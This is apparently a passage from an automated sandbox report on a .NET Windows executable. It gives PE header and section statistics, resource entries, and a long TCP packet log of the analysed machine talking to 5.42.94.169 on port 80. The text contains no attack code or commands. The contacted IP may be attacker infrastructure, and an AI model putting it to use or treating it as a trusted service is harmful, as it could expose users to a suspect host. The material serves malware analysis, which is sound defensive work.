IMAGE_DIRECTORY_ENTRY_DEBUG	0x8ad8	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6b55	0x6c00	False	0.5057146990740741	data	5.791232238044552	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x8f4	0xa00	False	0.2921875	data	4.376579543169947	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xa0b8	0x328	data
RT_VERSION	0xa3e0	0x328	data	English	United States
RT_MANIFEST	0xa708	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2023 17:14:51.786187887 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.835110903 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.835464001 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.860167980 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.911331892 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911371946 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911385059 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911403894 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911417961 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911432028 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911446095 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911465883 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911478996 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911498070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.911545992 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.911638021 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.960335970 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960397005 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960416079 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960436106 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960455894 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960474014 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960494041 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960513115 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960531950 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960550070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960567951 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960586071 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960602999 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960619926 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960633993 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.960639000 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960656881 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960675001 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960676908 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.960692883 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960701942 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.960711002 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960728884 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:51.960736990 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:51.960772038 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009464979 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009502888 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009522915 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009541035 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009560108 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009574890 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009582043 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009602070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009619951 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009625912 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009648085 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009649992 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009670973 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009673119 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009691954 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009711027 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009721994 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009732962 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009752989 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009766102 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009774923 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009789944 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009798050 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009819984 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009838104 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009859085 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009860039 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009879112 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009897947 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009902954 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009924889 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009946108 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009948969 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009964943 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.009972095 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.009987116 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010001898 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010008097 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010026932 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010050058 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010062933 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010071039 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010092974 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010097980 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010113955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010133028 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010142088 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010154963 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010174990 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010181904 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010196924 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010215998 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010221958 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010241985 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010260105 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010277033 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010282993 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010303020 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.010312080 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.010354042 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059163094 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059200048 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059220076 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059251070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059283018 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059295893 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059314966 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059334040 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059343100 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059355974 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059376955 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059379101 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059397936 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059412956 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059420109 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059434891 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059442043 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059461117 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059480906 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059489965 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059501886 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059523106 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059524059 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059542894 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059561968 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059577942 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059585094 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059603930 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059611082 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059623957 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059644938 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059647083 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059664965 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059684038 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059705973 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059711933 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059730053 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059755087 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059779882 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059783936 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059783936 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059802055 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059818029 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059825897 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059844971 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059865952 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059865952 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059885025 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059904099 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059906960 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059926033 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059942007 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059947968 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059967995 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.059983969 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.059990883 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060017109 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060030937 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.060055017 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060071945 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060091972 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060095072 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.060115099 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060137987 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060148954 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.060161114 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060180902 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060184956 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.060199976 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060219049 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060235023 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.060241938 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060260057 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.060282946 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.060319901 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.109149933 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109183073 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109203100 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109221935 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109240055 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109260082 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109278917 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109297991 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109316111 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109328985 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109348059 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109369040 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109391928 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109416008 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109435081 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109452009 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109469891 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109488010 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109505892 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109524012 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109543085 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109560966 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109580040 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109597921 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109616041 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109632969 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109652042 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109671116 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109688997 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109708071 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109724998 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109743118 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109761000 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109780073 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109798908 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109819889 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109838009 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109858036 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109877110 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109895945 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109915018 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109934092 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109951019 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109971046 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.109989882 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.110008001 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.110027075 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.110044956 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.110063076 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.110080957 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.126450062 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.175585985 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175633907 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175659895 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175685883 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175709963 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175736904 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175764084 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175786972 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175810099 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175812006 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.175836086 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175837040 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.175858021 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175879002 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175882101 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.175901890 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175920963 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175939083 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175941944 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.175956011 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175975084 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175976992 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.175993919 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.175998926 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176017046 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176034927 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176034927 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176055908 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176069975 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176074982 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176095009 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176116943 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176119089 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176139116 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176156998 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176157951 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176179886 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176193953 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176202059 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176227093 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176233053 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176244974 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176282883 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176306009 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176310062 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176331997 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176352024 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176353931 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176377058 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176390886 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176395893 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176414967 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176434040 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176450014 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176451921 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176470995 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176481009 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176489115 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176506996 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176516056 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176526070 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176543951 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176553011 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176563025 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176577091 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176580906 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176599026 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176618099 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176625013 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176636934 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176656961 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.176661968 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.176690102 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.225749969 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225791931 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225816011 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225845098 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225867987 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225886106 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225907087 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225927114 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225949049 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225954056 CEST	49708	80	192.168.2.6	5.42.94.169
Jun 6, 2023 17:14:52.225970984 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.225994110 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226016045 CEST	80	49708	5.42.94.169	192.168.2.6
Jun 6, 2023 17:14:52.226037025 CEST	80	49708	5.42.94.169	192.168.2.6
